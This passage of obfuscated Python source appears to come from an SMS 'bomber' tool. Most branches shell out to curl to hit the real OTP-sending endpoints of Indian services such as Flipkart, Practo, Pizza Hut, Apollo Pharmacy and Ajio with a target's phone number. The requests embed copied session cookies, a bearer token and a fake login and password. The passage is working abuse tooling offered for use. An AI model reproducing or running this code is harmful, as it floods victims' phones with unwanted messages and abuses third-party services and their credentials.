os .system ('curl -s -X POST -H "Host:www.flipkart.com" -H "Connection:keep-alive" -H "Content-Length:60" -H "X-user-agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop" -H "Origin:https://www.flipkart.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded" -H "Accept:*/*" -H "Referer:https://www.flipkart.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:T=BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050; SWAB=build-44be9e47461a74d737914207bcbafc30; lux_uid=155867904381892986; AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg=1; AMCV_17EB401053DAF4840A490D4C%40AdobeOrg=-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI; s_cc=true; SN=2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078; gpv_pn=HomePage; gpv_pn_t=Homepage; S=d1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==; s_sq=%5B%5BB%5D%5D" -d \'loginId=+'+OO0000O0O00O0OOO0 +O00OO00OO0OO0O0OO +'&state=VERIFIED&churnEmailRequest=false\' "https://www.flipkart.com/api/5/user/otp/generate" > /dev/null 2>&1')#line:326:os.system('curl -s -X POST -H "Host:www.flipkart.com" -H "Connection:keep-alive" -H "Content-Length:60" -H "X-user-agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop" -H "Origin:https://www.flipkart.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded" -H "Accept:*/*" -H "Referer:https://www.flipkart.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:T=BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050; SWAB=build-44be9e47461a74d737914207bcbafc30; lux_uid=155867904381892986; AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg=1; AMCV_17EB401053DAF4840A490D4C%40AdobeOrg=-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI; s_cc=true; SN=2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078; gpv_pn=HomePage; gpv_pn_t=Homepage; S=d1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==; s_sq=%5B%5BB%5D%5D" -d \'loginId=+' + cc + pn + '&state=VERIFIED&churnEmailRequest=false\' "https://www.flipkart.com/api/5/user/otp/generate" > /dev/null 2>&1')
return True #line:327:return True
elif OOO0O0OOOOO0O00OO ==8 :#line:328:elif lim == 8:
os .system ('curl -s -X POST -H "Host:www.ref-r.com" -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Accept-Language:en-US,en;q=0.5" -H "Accept-Encoding:gzip, deflate, br" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With:XMLHttpRequest" -H "Content-Length:26" -H "DNT:1" -H "Connection:keep-alive" -d "mobile='+O00OO00OO0OO0O0OO +'&submit=1&undefined=" "https://www.ref-r.com/clients/lenskart/smsApi" > /dev/null 2>&1')#line:329:os.system('curl -s -X POST -H "Host:www.ref-r.com" -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Accept-Language:en-US,en;q=0.5" -H "Accept-Encoding:gzip, deflate, br" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With:XMLHttpRequest" -H "Content-Length:26" -H "DNT:1" -H "Connection:keep-alive" -d "mobile=' + pn + '&submit=1&undefined=" "https://www.ref-r.com/clients/lenskart/smsApi" > /dev/null 2>&1')
return True #line:330:return True
elif OOO0O0OOOOO0O00OO ==9 :#line:331:elif lim == 9:
OO00OO0O000O00OOO =os .popen ('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B'+OO0000O0O00O0OOO0 +O00OO00OO0OO0O0OO +'&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read ()#line:332:rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return OO00OO0O000O00OOO .find ("success")!=-1 #line:333:return rd.find("success") != -1
elif OOO0O0OOOOO0O00OO ==10 :#line:334:elif lim == 10:
os .system ('curl -s -X POST -H "Host:m.pizzahut.co.in" -H "content-length:114" -H "origin:https://m.pizzahut.co.in" -H "authorization:Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4" -H "x-source-origin:PWAFW" -H "content-type:application/json" -H "accept:application/json, text/plain, */*" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "save-data:on" -H "languagecode:en" -H "referer:https://m.pizzahut.co.in/login" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_fbp=fb.2.1559973905081.1516144968" -H "cookie:_gat_UA-37858192-4=1" -H "cookie:_ga-ss=1|UA-37858192-4|https%3A%2F%2Fwww.google.com%2F" -H "cookie:_gid=GA1.3.1666290082.1559973902" -H "cookie:_ga=GA1.3.1893416092.1559973902" -H "cookie:run_fullstory_for_user=full_story_fail" -H "cookie:_gcl_au=1.1.2020385110.1559973902" -H "cookie:AKA_A2=A" -d \'{"customer":{"MobileNo":"'+O00OO00OO0OO0O0OO +'","UserName":"'+O00OO00OO0OO0O0OO +'","merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}\' "https://m.pizzahut.co.in/api/cart/send-otp?langCode=en" > /dev/null 2>&1')#line:336:'curl -s -X POST -H "Host:m.pizzahut.co.in" -H "content-length:114" -H "origin:https://m.pizzahut.co.in" -H "authorization:Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4" -H "x-source-origin:PWAFW" -H "content-type:application/json" -H "accept:application/json, text/plain, */*" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "save-data:on" -H "languagecode:en" -H "referer:https://m.pizzahut.co.in/login" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_fbp=fb.2.1559973905081.1516144968" -H "cookie:_gat_UA-37858192-4=1" -H "cookie:_ga-ss=1|UA-37858192-4|https%3A%2F%2Fwww.google.com%2F" -H "cookie:_gid=GA1.3.1666290082.1559973902" -H "cookie:_ga=GA1.3.1893416092.1559973902" -H "cookie:run_fullstory_for_user=full_story_fail" -H "cookie:_gcl_au=1.1.2020385110.1559973902" -H "cookie:AKA_A2=A" -d \'{"customer":{"MobileNo":"' + pn + '","UserName":"' + pn + '","merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}\' "https://m.pizzahut.co.in/api/cart/send-otp?langCode=en" > /dev/null 2>&1')
return True #line:337:return True
elif OOO0O0OOOOO0O00OO ==11 :#line:338:elif lim == 11:
os .system ('curl -s -X POST -H "host:www.goibibo.com" -H "user-agent:Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0" -H "accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.goibibo.com/mobile/?sms=success" -H "content-type:application/x-www-form-urlencoded" -H "content-length:14" -H "connection:keep-alive" -H "upgrade-insecure-requests:1" -d "mbl='+O00OO00OO0OO0O0OO +'" "https://www.goibibo.com/common/downloadsms/" > /dev/null 2>&1')#line:339:os.system('curl -s -X POST -H "host:www.goibibo.com" -H "user-agent:Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0" -H "accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.goibibo.com/mobile/?sms=success" -H "content-type:application/x-www-form-urlencoded" -H "content-length:14" -H "connection:keep-alive" -H "upgrade-insecure-requests:1" -d "mbl=' + pn + '" "https://www.goibibo.com/common/downloadsms/" > /dev/null 2>&1')
return True #line:340:return True
elif OOO0O0OOOOO0O00OO ==12 :#line:341:elif lim == 12:
os .popen ('rm temp.xxx1 > /dev/null 2>&1')#line:342:os.popen('rm temp.xxx1 > /dev/null 2>&1')
os .system ('curl -s -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "origin:https://www.apollopharmacy.in" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:__cfduid=d64c65a2edad54086382759cdf599de901558686615" -H "cookie:_ga=GA1.2.1278908803.1558686621" -H "cookie:__ta_device=fAz8eA9Rx40yyIiB5mzvHt4apFaSkMBA" -H "cookie:_fbp=fb.1.1558686627127.655454618" -H "cookie:__stat="BLOCK"" -H "cookie:jv_visits_count_EXRKNIzFkV=1" -H "cookie:__stp={"visit":"returning","uuid":"d9a1c39d-efbd-4911-ac0e-6333455f9fbb"}" -H "cookie:PHPSESSID=vnj2hvk8nga4v1m2hvlmvl88r4" -H "cookie:_gid=GA1.2.132668726.1560239715" -H "cookie:_gat=1" -H "cookie:__ta_visit=f5uvpYKu8EVmJAJmFGXMmXGSTiNQSWRS" -H "cookie:_gat_UA-31142855-1=1" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:private_content_version=46e6c8611a9b0d06e662da50ca5cf311" -H "cookie:AWSALB=2177QHjXXrFgaem1w0FrBqZ2aoKrMhI+DibolJaee9cVOP4ZSV2LiLC3tks68ud4ERCydxa8kb4klbiI+VEnNQB0rsyins1USgvHcPOUoz2nySN3SC5G/wpAACIq" -H "cookie:section_data_ids=%7B%22cart%22%3A1560239751%7D" -d \'mobile='+O00OO00OO0OO0O0OO +'\' "https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" --output temp.xxx1')#line:344:'curl -s -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "origin:https://www.apollopharmacy.in" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:__cfduid=d64c65a2edad54086382759cdf599de901558686615" -H "cookie:_ga=GA1.2.1278908803.1558686621" -H "cookie:__ta_device=fAz8eA9Rx40yyIiB5mzvHt4apFaSkMBA" -H "cookie:_fbp=fb.1.1558686627127.655454618" -H "cookie:__stat="BLOCK"" -H "cookie:jv_visits_count_EXRKNIzFkV=1" -H "cookie:__stp={"visit":"returning","uuid":"d9a1c39d-efbd-4911-ac0e-6333455f9fbb"}" -H "cookie:PHPSESSID=vnj2hvk8nga4v1m2hvlmvl88r4" -H "cookie:_gid=GA1.2.132668726.1560239715" -H "cookie:_gat=1" -H "cookie:__ta_visit=f5uvpYKu8EVmJAJmFGXMmXGSTiNQSWRS" -H "cookie:_gat_UA-31142855-1=1" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:private_content_version=46e6c8611a9b0d06e662da50ca5cf311" -H "cookie:AWSALB=2177QHjXXrFgaem1w0FrBqZ2aoKrMhI+DibolJaee9cVOP4ZSV2LiLC3tks68ud4ERCydxa8kb4klbiI+VEnNQB0rsyins1USgvHcPOUoz2nySN3SC5G/wpAACIq" -H "cookie:section_data_ids=%7B%22cart%22%3A1560239751%7D" -d \'mobile=' + pn + '\' "https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" --output temp.xxx1')
while not os .path .exists ('temp.xxx1'):#line:345:while not os.path.exists('temp.xxx1'):
time .sleep (0.1 )#line:346:time.sleep(0.1)
OO00OO0O000O00OOO =str (open ('temp.xxx1','rb').read ())+" "#line:347:rd = str(open('temp.xxx1', 'rb').read()) + " "
return OO00OO0O000O00OOO .find ("sent")!=-1 #line:348:return rd.find("sent") != -1
elif OOO0O0OOOOO0O00OO ==13 :#line:349:elif lim == 13:
OO00OO0O000O00OOO =' '#line:350:rd = ' '
try :#line:351:try:
OO00OO0O000O00OOO =os .popen (' curl -s -X POST -H "Host:www.ajio.com" -H "Connection:keep-alive" -H "Content-Length:144" -H "Accept:application/json" -H "Origin:https://www.ajio.com" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "Referer:https://www.ajio.com/signup" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:_ga=GA1.2.979928319.1560364071; _gid=GA1.2.666270216.1560364071; V=201; _fbp=fb.1.1560364076913.1528349725; cto_lwid=d91bea3a-7610-45aa-8f78-65a0d740fb46; PushSubscriberStatus=DENIED; peclosed=true; G_ENABLED_IDPS=google; TS018cc593=01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50; _gac_UA-68002030-1=1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB; cdigiMrkt=utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C; ImpressionCookie=4; ip=10.1.10.1; sessionStatus=true|undefined; FirstPage=Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time); _dc_gtm_UA-68002030-1=1; uI=johnyaho%40gmail.com; TS01fe4249=01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c" -d \'{"firstName":"Rox","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"'+O00OO00OO0OO0O0OO +'","requestType":"SENDOTP"}\' "https://www.ajio.com/api/auth/signupSendOTP" ').read ()#line:353:' curl -s -X POST -H "Host:www.ajio.com" -H "Connection:keep-alive" -H "Content-Length:144" -H "Accept:application/json" -H "Origin:https://www.ajio.com" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "Referer:https://www.ajio.com/signup" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:_ga=GA1.2.979928319.1560364071; _gid=GA1.2.666270216.1560364071; V=201; _fbp=fb.1.1560364076913.1528349725; cto_lwid=d91bea3a-7610-45aa-8f78-65a0d740fb46; PushSubscriberStatus=DENIED; peclosed=true; G_ENABLED_IDPS=google; TS018cc593=01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50; _gac_UA-68002030-1=1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB; cdigiMrkt=utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C; ImpressionCookie=4; ip=10.1.10.1; sessionStatus=true|undefined; FirstPage=Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time); _dc_gtm_UA-68002030-1=1; uI=johnyaho%40gmail.com; TS01fe4249=01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c" -d \'{"firstName":"Rox","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"' + pn + '","requestType":"SENDOTP"}\' "https://www.ajio.com/api/auth/signupSendOTP" ').read()
except Exception :#line:354:except Exception:
return True #line:355:return True
if OO00OO0O000O00OOO .find ("\"statusCode\":\"1\"")!=-1 :#line:356:if rd.find("\"statusCode\":\"1\"") != -1:
return True #line:357:return True
else :#line:358:else:
return False #line:359:return False
elif OOO0O0OOOOO0O00OO ==14 :#line:360:elif lim == 14:
OO0O0OO00000OO00O ='{"country_code":"'+OO0000O0O00O0OOO0 +'","phone_number":"'+O00OO00OO0OO0O0OO +'"}'#line:361:con = '{"country_code":"' + cc + '","phone_number":"' + pn + '"}'
os .popen ('rm temp.xxx2 > /dev/null 2>&1')#line:362:os.popen('rm temp.xxx2 > /dev/null 2>&1')
os .system ('curl -s -X POST -H "Host:api.cloud.altbalaji.com" -H "Connection:keep-alive" -H "Content-Length:'+str (len (OO0O0OO00000OO00O ))+'" -H "Accept:application/json, text/plain, */*" -H "Origin:https://lite.altbalaji.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36" -H "Content-Type:application/json;charset=UTF-8" -H "Referer:https://lite.altbalaji.com/subscribe?progress=input" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -d \''+OO0O0OO00000OO00O +'\' "https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN" -o temp.xxx2')#line:364:'" -H "Accept:application/json, text/plain, */*" -H "Origin:https://lite.altbalaji.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36" -H "Content-Type:application/json;charset=UTF-8" -H "Referer:https://lite.altbalaji.com/subscribe?progress=input" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -d \'' + con + '\' "https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN" -o temp.xxx2')
while not os .path .exists ('temp.xxx2'):#line:365:while not os.path.exists('temp.xxx2'):
time .sleep (0.1 )#line:366:time.sleep(0.1)
OO00OO0O000O00OOO =hashlib .md5 (open ('temp.xxx2','rb').read ()).hexdigest ()#line:367:rd = hashlib.md5(open('temp.xxx2', 'rb').read()).hexdigest()
return OO00OO0O000O00OOO =='24f467b24087ff48c96321786d89c69f'#line:368:return rd == '24f467b24087ff48c96321786d89c69f'
elif OOO0O0OOOOO0O00OO ==15 :#line:369:elif lim == 15:
OO00OO0O000O00OOO =os .popen ('curl -s -X POST -H "Host:www.aala.com" -H "Connection:keep-alive" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Origin:https://www.aala.com" -H "X-Requested-With:XMLHttpRequest" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "Referer:https://www.aala.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5" -H "Cookie:frontend=a27mn3h3irt1rlt6i55s93p9r5; frontend_cid=8zqBBzwQTMIt9UKg; _BEAMER_USER_ID_gADrycBn12870=c9fe4f7d-b421-4bad-9cf2-0a4db716dff4; G_ENABLED_IDPS=google" -d \'email='+OO0000O0O00O0OOO0 +O00OO00OO0OO0O0OO +'&firstname=SpeedX&lastname=SpeedX\' "https://www.aala.com/accustomer/ajax/getOTP"').read ().strip ()#line:370:rd = os.popen('curl -s -X POST -H "Host:www.aala.com" -H "Connection:keep-alive" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Origin:https://www.aala.com" -H "X-Requested-With:XMLHttpRequest" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "Referer:https://www.aala.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5" -H "Cookie:frontend=a27mn3h3irt1rlt6i55s93p9r5; frontend_cid=8zqBBzwQTMIt9UKg; _BEAMER_USER_ID_gADrycBn12870=c9fe4f7d-b421-4bad-9cf2-0a4db716dff4; G_ENABLED_IDPS=google" -d \'email=' + cc + pn + '&firstname=SpeedX&lastname=SpeedX\' "https://www.aala.com/accustomer/ajax/getOTP"').read().strip()
